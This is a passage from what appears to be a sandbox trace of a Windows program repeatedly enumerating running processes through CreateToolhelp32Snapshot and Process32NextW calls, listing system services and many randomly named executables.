lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.546] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.547] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.548] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.549] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.550] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0105.551] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.552] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.553] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.554] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.555] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.556] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.557] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0105.558] CloseHandle (hObject=0xbc) returned 1 [0105.558] Sleep (dwMilliseconds=0x12c) [0105.886] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0105.891] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.892] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.892] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.894] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.902] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.903] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.903] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.904] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.908] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.910] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.912] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.913] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.914] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0105.915] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0105.917] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.919] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.965] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.966] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.967] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.968] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.969] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.970] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.971] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.972] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0105.973] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.974] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.975] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.976] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.977] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.978] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.979] CloseHandle (hObject=0xc4) returned 1 [0105.979] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0105.984] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.985] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.985] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.986] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.987] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.987] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.988] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.990] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.991] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.991] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.992] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.992] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.993] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.994] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.995] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.995] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.996] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.997] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.998] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.999] 